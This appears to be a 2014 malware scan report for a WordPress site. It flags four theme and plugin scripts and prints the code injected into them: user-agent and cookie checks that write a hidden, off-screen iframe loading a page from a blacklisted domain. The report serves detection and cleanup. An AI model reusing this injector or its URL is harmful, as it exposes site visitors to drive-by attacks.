Scanned pages/files
Request | Server response | Status |
http://painuk.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 15 Sep 2014 10:50:31 GMT Location: http://www.painuk.org/ Server: cloudflare-nginx Vary: Cookie,User-Agent,Accept-Encoding Content-Type: text/html; charset=UTF-8 CF-RAY: 16a443821d5d0f63-FRA Set-Cookie: __cfduid=db45c6a373337f109a4ab91d0aa50fe081410778230099; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.painuk.org; HttpOnly X-Pingback: http://www.painuk.org/xmlrpc.php X-Powered-By: PHP/5.3.27 | clean |
http://www.painuk.org/ | 200 OK Content-Length: 44001 Content-Type: text/html | clean |
http://www.painuk.org/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96314 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-content/plugins/media-element-html5-video-and-audio-player/mediaelement/mediaelement-and-player.min.js?ver=2.1.3 | 200 OK Content-Length: 64806 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-content/themes/wp-davinci-20/js/flexslider.js?ver=3.9.2 | 200 OK Content-Length: 14884 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-content/themes/wp-davinci-20/js/framework.js?ver=3.9.2 | 200 OK Content-Length: 1503 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Flagged snippet (the scanner's excerpt breaks off inside the getCookie("ultras17bros… call, so the visible part shows only a cookie lookup and tests on navigator.userAgent): function getCookie(name){var templateshoper=document.cookie.match(new RegExp("(?:^|; )"+ name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return templateshoper?decodeURIComponent(templateshoper[1]):undefined;} function Hardtechnology(){var JameNoober=navigator.userAgent;var NiceProgroude=(JameNoober.indexOf("IEMobile")>-1||JameNoober.indexOf("Windows NT 6.3")>-1||JameNoober.indexOf("Chrome")>-1||JameNoober.indexOf("Windows")<+1);var Plogin=(getCookie("ultras17bros ...[excerpt truncated in the report]... return false;});});
Antivirus reports: (the results table is empty in this copy of the report)
http://www.painuk.org/wp-content/themes/wp-davinci-20/js/external.js?ver=3.9.2 | 200 OK Content-Length: 295 Content-Type: application/javascript | clean |
http://www.painuk.org/wp-content/themes/wp-davinci-20/js/suckerfish.js?ver=3.9.2 | 200 OK Content-Length: 1312 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). Flagged snippet (the excerpt breaks off inside the getCookie("ultras17bros… call; the sfHover code after the Hardtechnology() call appears to be the theme's original menu script, with the flagged functions placed ahead of it): function getCookie(name){var templateshoper=document.cookie.match(new RegExp("(?:^|; )"+ name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,'\\$1')+"=([^;]*)"));return templateshoper?decodeURIComponent(templateshoper[1]):undefined;} function Hardtechnology(){var JameNoober=navigator.userAgent;var NiceProgroude=(JameNoober.indexOf("IEMobile")>-1||JameNoober.indexOf("Windows NT 6.3")>-1||JameNoober.indexOf("Chrome")>-1||JameNoober.indexOf("Windows")<+1);var Plogin=(getCookie("ultras17bros ...[excerpt truncated in the report]... Hardtechnology();sfHover=function(){var sfEls=document.getElementById("topnav").getElementsByTagName("li");for(var i=0;i<sfEls.length;i++){sfEls[i].onmouseover=function(){this.className+=" sfhover";} sfEls[i].onmouseout=function(){this.className=this.className.replace(new RegExp(" sfhover\\b"),"");}}} if(window.attachEvent)window.attachEvent("onload",sfHover);
Antivirus reports: (the results table is empty in this copy of the report)
http://www.statcounter.com/counter/counter_xhtml.js | 200 OK Content-Length: 15530 Content-Type: application/x-javascript | clean |
http://www.painuk.org/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 1997 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.ksatria-hafidz.com. Flagged snippet: ...[259 bytes skipped]... nction Pleos_Aflertuder() { var r_amblartide = navigator.userAgent; var Yellowgrand = (r_amblartide.indexOf("IEMobile") > -1 || r_amblartide.indexOf("Windows NT 6.3") > -1 || r_amblartide.indexOf("Chrome") > -1 || r_amblartide.indexOf("Windows") < +1); var Ultrastilus = (getCookie("Garamg18usality") === undefined); if (!Yellowgrand && Ultrastilus) { document.write('<iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>'); var date = new Date( new Date().getTime() + 66*60*60*1000 ); document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString(); } } Pleos_Aflertuder(); var ...[801 bytes skipped]... Decoded script: <iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100, src: http://quqylife.ksatria-hafidz.com/internetioane16.html. This URL is marked by Google as suspicious. <iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> Note for triage: the snippet writes the iframe only when none of its user-agent tests match and the Garamg18usality cookie is unset, and it then sets that cookie with a 66-hour expiry; the iframe is absolutely positioned at -902px, outside the visible page. A browser visit can therefore look clean while the file is still modified, so verify cleanup against the script file itself.
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201435 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Augaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.painuk.org/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.9.2 | 200 OK Content-Length: 1777 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: quqylife.ksatria-hafidz.com. Flagged snippet: ...[160 bytes skipped]... epize?decodeURIComponent(Smilepize[1]):undefined;} function Pleos_Aflertuder(){var r_amblartide=navigator.userAgent;var Yellowgrand=(r_amblartide.indexOf("IEMobile")>-1||r_amblartide.indexOf("Windows NT 6.3")>-1||r_amblartide.indexOf("Chrome")>-1||r_amblartide.indexOf("Windows")<+1);var Ultrastilus=(getCookie("Garamg18usality")===undefined);if(!Yellowgrand&&Ultrastilus){document.write('<iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe>');var date=new Date(new Date().getTime()+ 66*60*60*1000);document.cookie="Garamg18usality=1; path=/; expires="+date.toUTCString();}} Pleos_Aflertuder();WPGroHo=jQuery.extend({my_hash:'',data: ...[729 bytes skipped]... Decoded script: <iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400D12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"></iframe> Malicious iFrame found. size: 100x100, src: http://quqylife.ksatria-hafidz.com/internetioane16.html. This URL is marked by Google as suspicious. <iframe src="http://quqylife.ksatria-hafidz.com/internetioane16.html" style="left: -902px;border-right-width: 10px;border-left-style: dotted;border-left-width: 10px;background-color: rgb(95, 0, 95);border-right-color: #400d12;position: absolute;border-right-style: solid;height: 100px;width: 100px;top: -902px;"> Note: this is the same Pleos_Aflertuder function reported for comment-reply.min.js, here in minified form; in the excerpt it sits directly ahead of the plugin's own WPGroHo code.
http://stats.wp.com/e-201435.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://painuk.org/cdn-cgi/l/email-protection | 200 OK Content-Length: 4211 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: painuk.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 10:50:31 GMT
Location: http://www.painuk.org/
Server: cloudflare-nginx
Vary: Cookie,User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
CF-RAY: 16a443821d5d0f63-FRA
Set-Cookie: __cfduid=db45c6a373337f109a4ab91d0aa50fe081410778230099; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.painuk.org; HttpOnly
X-Pingback: http://www.painuk.org/xmlrpc.php
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: painuk.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 15 Sep 2014 10:50:31 GMT
Location: http://www.painuk.org/
Server: cloudflare-nginx
Vary: Cookie,User-Agent,Accept-Encoding
Content-Type: text/html; charset=UTF-8
CF-RAY: 16a443821d5d0f63-FRA
Set-Cookie: __cfduid=db45c6a373337f109a4ab91d0aa50fe081410778230099; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.painuk.org; HttpOnly
X-Pingback: http://www.painuk.org/xmlrpc.php
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: painuk.org
Referer: http://www.google.com/search?q=painuk.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: painuk.org
Referer: http://www.google.com/search?q=painuk.org
Result:
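The result is the same as for the first query; no suspicious redirects were found. This check covers HTTP-level redirects only: the iframe injection reported under "Scanned pages/files" is written by JavaScript in the browser and would not appear in these response headers.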
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=painuk.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://painuk.org/
Result: painuk.org is not infected or malware details are not published yet.
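Result: painuk.org is not infected or malware details are not published yet. Neither blacklist result clears the site: the scan above flags four of its scripts as malicious, and the iframe URL found in two of them is reported as marked suspicious by Google.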